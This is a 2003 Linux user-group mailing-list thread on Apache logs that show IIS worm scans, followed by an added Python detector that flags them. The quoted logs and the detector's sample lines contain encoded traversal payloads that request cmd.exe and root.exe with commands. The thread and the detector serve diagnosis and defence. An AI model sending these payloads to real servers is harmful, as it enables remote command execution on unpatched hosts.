A person from the DigitalFilipino mailing list was also attacked by the same person / computer recently. His/her logs show:

<snip>
[Sun Feb 16 21:32:12 2003] [error] [client 202.138.135.3] File does not exist: /var/www/html/scripts/..%2f../winnt/system32/cmd.exe
[Sun Feb 16 21:57:12 2003] [error] [client 202.138.135.3] File does not exist: /var/www/html/scripts/root.exe
[Sun Feb 16 21:57:13 2003] [error] [client 202.138.135.3] File does not exist: /var/www/html/MSADC/root.exe

On Tue, 2003-02-18 at 10:07, [EMAIL PROTECTED] wrote:
> Fellow,
> You mean that this IP address from the non-authoritative answer wants to hack:
> 3.135.138.202.in-addr.arpa name = reol.ph. - this one? 202.138.135.3
> 3.135.138.202.in-addr.arpa name = proxy.reol.ph. this one?
>
> Authoritative answers can be found from:
> 135.138.202.in-addr.arpa nameserver = dns02.digitelone.com.
> 135.138.202.in-addr.arpa nameserver = dns01.digitelone.com.
> dns01.digitelone.com internet address = 202.138.128.1
> dns02.digitelone.com internet address = 202.138.128.2
>
> What can he get from my server? Why is there something about
> winnt\system32\cmd.exe? IIS is for MS apps.
> oninz
>
> > code red or some other worm scanning for vulnerable IIS webservers to
> > infect
> >
> > no worries... unless you got an unpatched IIS box :)
> >
> > Allen Umlas wrote:
> >
> >> 202.54.67.195 - - [17/Feb/2003:16:09:02 +0800] "0^A^E6pæ^óÛ} 6ZÆ»æh9ÔÜA^E6pæ^óÛ} 6ZÆ»æh9Ô4.0 ($
> >> 202.54.67.195 - - [17/Feb/2003:16:09:51 +0800] "0^A^E6pæ^óÛ} 6ZÆ»æh9ÔÝé0^A^E6pæ^óÛ} 6ZÆ»æh9Ô "$
> >> 202.54.67.195 - - [17/Feb/2003:16:10:08 +0800] "ß ¾U4Û&^_Åÿ$^_ðÖaÞpß ¾U4Û&^_Åÿ$^_ðÖaÞpß$0 1501
> >> 202.138.177.36 - - [17/Feb/2003:16:13:34 +0800] "GET /webmail/src/left_main.php HTTP/1.1" 200 1902
> >> 202.138.135.3 - - [17/Feb/2003:16:15:25 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283 "-$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:39 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281 "-" $
> >> 202.138.135.3 - - [17/Feb/2003:16:15:40 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:42 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:44 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:46 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:51 +0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:53 +0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c..$
> >> 202.138.135.3 - - [17/Feb/2003:16:15:57 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c$
> >> 202.138.135.3 - - [17/Feb/2003:16:16:20 +0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c$
> >> 202.138.135.3 - - [17/Feb/2003:16:16:25 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c$
> >> 202.138.135.3 - - [17/Feb/2003:16:16:30 +0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c$
> >> 202.138.135.3 - - [17/Feb/2003:16:16:37 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/$
> >> 202.138.135.3 - - [17/Feb/2003:16:16:42 +0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+
> >> 202.138.135.3 - - [17/Feb/2003:16:16:47 +0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe$
> >>
> >>
> >> oninz

_
Philippine Linux Users Group. Web site and archives at http://plug.linux.org.ph
To leave: send "unsubscribe" in the body to [EMAIL PROTECTED]
Fully Searchable Archives With Friendly Web Interface at http://marc.free.net.ph
To subscribe to the Linux Newbies' List: send "subscribe" in the body to [EMAIL PROTECTED]
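A small detector for the scan pattern the thread is looking at, added here as an example and not code from the thread or from PLUG: it parses Apache access-log lines, undoes the double-percent and overlong-UTF-8 encodings these requests use (the same trick the vulnerable IIS decoder fell for), and flags requests aimed at root.exe or cmd.exe, counting hits per source. The log lines are constructed samples modelled on the quoted entries, with addresses from the 203.0.113.0/24 documentation range; the regexes and tag names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines (Apache common log format), modelled on the entries
# quoted in the thread; addresses are from the 203.0.113.0/24 documentation range.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Feb/2003:16:13:34 +0800] "GET /webmail/src/left_main.php HTTP/1.1" 200 1902
203.0.113.9 - - [17/Feb/2003:16:15:25 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 283
203.0.113.9 - - [17/Feb/2003:16:15:39 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
203.0.113.9 - - [17/Feb/2003:16:15:44 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
203.0.113.9 - - [17/Feb/2003:16:16:25 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
203.0.113.9 - - [17/Feb/2003:16:16:37 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')
# %c0%af, %c1%9c, %c1%1c ...: overlong UTF-8 that IIS once accepted as '/' or '\'.
# Valid UTF-8 never uses a C0 or C1 lead byte, so any match is suspicious.
OVERLONG_UTF8 = re.compile(r'%c[01]%[0-9a-f]{2}', re.I)
TRAVERSAL = re.compile(r'\.\.[/\\]')
TARGETS = ('/winnt/system32/cmd.exe', '/root.exe')  # Nimda / Code Red II artefacts

def normalize(path):
    """Decode the way the vulnerable server did: repeatedly, with overlong bytes as '/'."""
    p = path.split('?', 1)[0]
    for _ in range(3):  # %25%35%63 -> %5c -> '\' takes two rounds; stop when stable
        q = unquote(OVERLONG_UTF8.sub('/', p))
        if q == p:
            break
        p = q
    return p.lower()

def classify(line):
    """Return a hit record for a scan request, or None for a benign or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None  # binary junk (e.g. TLS sent to port 80) does not parse; skip it
    raw, norm, reasons = m['path'], normalize(m['path']), []
    if any(t in norm for t in TARGETS):
        reasons.append('iis-shell-target')
    if '%' in raw and TRAVERSAL.search(norm):
        reasons.append('encoded-traversal')
    if OVERLONG_UTF8.search(raw):
        reasons.append('overlong-utf8')
    return {'ip': m['ip'], 'path': raw, 'status': int(m['status']), 'reasons': reasons} if reasons else None

def scan_report(text):
    """All hits plus a per-source count, so a single scanner shows up as one burst."""
    hits = [h for h in map(classify, text.splitlines()) if h]
    return hits, Counter(h['ip'] for h in hits)
```

On the sample, the webmail request is left alone and all five IIS probes are attributed to one source, even though every one of them returned 404 on the Apache host, which is the point the replies make: the scanner does not care what the server is.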
